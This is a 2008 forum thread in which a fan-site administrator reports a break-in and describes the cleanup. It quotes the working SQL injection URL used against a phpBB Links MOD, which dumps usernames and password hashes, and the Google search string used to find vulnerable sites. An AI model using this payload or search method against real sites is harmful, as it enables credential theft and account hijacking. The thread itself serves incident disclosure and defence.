Hacked


Page 1 of 1
 
 

Post Hacked

#1  Tormie 15 Feb 2008 10:28

I have to run to work now, so I'll expand the topic later.

Today an user from 76.106.153.204 (comcast, USA) hacked the site. he did no damage and impersonated me and Andreas
It used a hole in the file links.php that has been removed, I'll investigate more when I'll be back.
I've also banned the Ip address and emailed at the abuse service at comcast.

It seemed to use a cookie "impersonation" so please Andreas, log out go here:

http://www.posetteforever.com/mycookies.php

close the browser, open it and login again.

Please, please, read the other topic about how to shut off the site when something like this happens   , try it and memorize the procedure, it's very important        

Back later

Davide
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#2  Tormie 15 Feb 2008 18:50

Update:

I came home form work and I found that this was bad but it could be worse.

The Hacker attacked the file links.php (no more existing...) using this code:

Code: [Download] [Hide] [Select]
http://www.posetteforever.com/links.php?t=search&search_keywords=asd&start=1,1+UNION+SELECT+1,username,user_password,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*



Edit: DON'T try that code now, I've just installed a security code and you will be banned on the spot!!

this resulted in giving him the list all the hashes of the password (encrypted passwords in the database) and thus building a session key and simply steal the user's identity.

What he did and tried to do ?

First he tried to access the administration control panel, but it has a double password (that is what saved us) so he could not deface the site and limited the attack to steal Andreas identity and to lurk in some profiles, actually the one of grouchocaesar trying to change things but was stopped by the antispam protection. So he went to the shoutbox and wrote something about the lack of security and how he was a good hacker and did nothing (actually sure he could have done damages with my account but he wanted to do something worse in the admin control panel).

What I did ?

He had ALL the encrypted passwords (all the passwords in the site are encrypted, not even I can know what is the original password, but knowing the encrypted password in the database one can build a link with a working session id) So I searched and found a tool to re-encrypt the password twice, this tools also prevents the use of the encrypted password to enter the site. the alternative would have been to ask EVERYONE to change password.

Now, even if I changed the encrypted passwords, I suggest you to go to your control panel and change your password with a new one. I'll also chenage the password for the control panel with a new one and I'll send you the data with an email (if one steal your identity here he can go to this forum and simply see what the password is...)

Plus, having the complete log, I already cintacted comcast but I'll contact the FBI in the USA too.

More about this "phpBB Links MOD 1.2.2 Remote SQL Injection Exploit" can be found here:

http://www.waraxe.us/ftopict-1916.html

You can see that this autonamed "hacker" did only a simple cut and paste from a code someone else did.

What he did is go to google and use this search string:

allinurl:links.php

he found us here (I can't see posetteforever now but it was one of the results)

http://www.google.com/search?q=alli...n&start=80&sa=N

then he went to the site and applied the hack code above, next he searched for my nickname:

Code: [Download] [Hide] [Select]
30956      Anonymous      76.106.153.204      2008 Feb 15 06:42      profile.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: profile.php
Parameters: mode=viewprofile&u=2
http_referer: http://www.posetteforever.com/forum.php


here he is "me":

Code: [Download] [Hide] [Select]
30958      Tormie      76.106.153.204      2008 Feb 15 06:43      index.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: index.php
Parameters:
http_referer: http://www.posetteforever.com/login_PF.php


The first thing he tries is to go to the admin panel (and it was stopped by the password protection)

Code: [Download] [Hide] [Select]
30966      Tormie      76.106.153.204      2008 Feb 15 06:45      index.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: index.php
Parameters:
http_referer: http://www.posetteforever.com/adm/


Andreas was on the site so he went to see his account number (78)

Code: [Download] [Hide] [Select]
30970      Tormie      76.106.153.204      2008 Feb 15 06:47      profile.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: profile.php
Parameters: mode=viewprofile&u=78
http_referer: http://www.posetteforever.com/


here he is "Ahjah"
Code: [Download] [Hide] [Select]
30978      ahjah      76.106.153.204      2008 Feb 15 06:50      index.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: index.php
Parameters:
http_referer: http://www.posetteforever.com/login_PF.php?redirect=index.php


here he goes to Andreas preferences (please andreas check them)
Code: [Download] [Hide] [Select]
31030      ahjah      76.106.153.204      2008 Feb 15 07:09      profile.php (GET)      -      US      -      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12      
      
Page Page: profile.php
Parameters: mode=editprofile&cpl_mode=preferences
http_referer: http://www.posetteforever.com/profile_main.php



and that's all for now ...
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#3  ahjah 15 Feb 2008 20:42

I'll check my stuff and change my password ( )...
 




____________
Image
 
avatar
blank.gif ahjah Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Chief
Chief
Old Timer
Old Timer
 
Joined: April 2003
Location: detmold/germany
Posts: 2801
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#4  Tormie 15 Feb 2008 20:49

it is "just in case" Andreas, I've already re-encrypted them with a different method, to put it clearer, no one can know what your password is if not you , what is in the site is a MD5 encrypted string based on your password, the hacker got a list of this strings, but I've already changed them all so everyone is safe , but you know... maybe ...

For some reason that i don't understand we have been "under attack" since some months ago, however we where lucky this time. I'll do backups more often...
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#5  ahjah 15 Feb 2008 21:05

... but we won't back down!   
 




____________
Image
 
avatar
blank.gif ahjah Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Chief
Chief
Old Timer
Old Timer
 
Joined: April 2003
Location: detmold/germany
Posts: 2801
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#6  tda42 16 Feb 2008 00:11

So what is with all of this Posy is welcoming around here? Greywolf and all. Is that part of the Hacker? It is really surprising that we are getting hit now.
 




____________
Two wrongs don't make a right.
But six left turns will get you around the block
and back in the driveway again.
 
avatar
blank.gif tda42 Gender: Male
...Pink Paws...
...Pink Paws...
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Old Timer
Old Timer
 
Joined: November 2003
Location: Tennessee, The Great Polecat State
Posts: 2551
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#7  Tormie 16 Feb 2008 00:20

No, it's an old feature that I resurrected, Posy will hug all new registered users . Yes it is surprising Kenny, it was also my fault not to keep certain files updated. I'm actually working on a major upgrade of the main security package installed, ctracker (at night, as usual )
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#8  tda42 16 Feb 2008 00:26

Maybe when it comes to topics like Hacking we need to keep it in the Mod area. It seems like some of the forum may have started a challenge with a Hacker out on the net. It has been quite and then this happens. Really makes you wonder. Very strange.
 




____________
Two wrongs don't make a right.
But six left turns will get you around the block
and back in the driveway again.
 
avatar
blank.gif tda42 Gender: Male
...Pink Paws...
...Pink Paws...
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Old Timer
Old Timer
 
Joined: November 2003
Location: Tennessee, The Great Polecat State
Posts: 2551
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#9  Tormie 16 Feb 2008 00:42

Kenny, the people that tries to hack Posetteforever are not real hackers, for a hackers PF can't be a target, it's a place without any commercial involvement. I's a target for people that cut & paste lines of code made by someone else, same as happened to 3dtapestry recently...
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#10  tda42 16 Feb 2008 00:59

Yes I know that Davide. What I was trying to say is that they may be doing this just for sport because we had talked about Hacking before and they fed of the conversation as a challenge.
 




____________
Two wrongs don't make a right.
But six left turns will get you around the block
and back in the driveway again.
 
avatar
blank.gif tda42 Gender: Male
...Pink Paws...
...Pink Paws...
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Old Timer
Old Timer
 
Joined: November 2003
Location: Tennessee, The Great Polecat State
Posts: 2551
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#11  Tormie 16 Feb 2008 01:04

maybe we're not winning but we're not even losing
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#12  tda42 16 Feb 2008 01:18

  
 




____________
Two wrongs don't make a right.
But six left turns will get you around the block
and back in the driveway again.
 
avatar
blank.gif tda42 Gender: Male
...Pink Paws...
...Pink Paws...
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Old Timer
Old Timer
 
Joined: November 2003
Location: Tennessee, The Great Polecat State
Posts: 2551
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#13  Tormie 16 Feb 2008 22:01

Well, after today's work on the site I think we've reached the maximum security level EVER, lol.

There were a couple of "phpBB security" packages that I never installed because they collided with other packages installed, but in the last period I became a little more skilled in understanding PHP (that is the programming language of the site) and I succeded in doing what I think is a good work.

Now if someone tries an UNION attack or some other tricks, he is automatically banned and blacklisted with a message that says "Posy Thinks You Should Go In Our Black List."

This system blocks different kinds of attacks, but expecially on DDOS attacks it can fails sometimes, so if you got banned for an error, contact me asap (I'll set the DDOS attacks on "BLOCK" instead of "BAN" anyway)

So now it's time to go back to normal businness ...
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#14  ahjah 16 Feb 2008 22:31

<- forgot this one??
 




____________
Image
 
avatar
blank.gif ahjah Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Chief
Chief
Old Timer
Old Timer
 
Joined: April 2003
Location: detmold/germany
Posts: 2801
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 

Post Re: Hacked

#15  Tormie 16 Feb 2008 22:57

Damn...  
 




____________
 
avatar
it.png Tormie Gender: Male
Posette enthusiast
Posette enthusiast
Life + 1
Life + 1
Renderosity Ban
Renderosity Ban
 
Joined: March 2003
Posts: 8280
Tomatoes
Lemons
hearts

  • Back to top Page bottom
 


HideWas this topic useful?
Link this topic
URL
BBCode
HTML

Page 1 of 1
 



Users browsing this topic: 0 Registered, 0 Hidden and 1 Visitor
Registered Users: None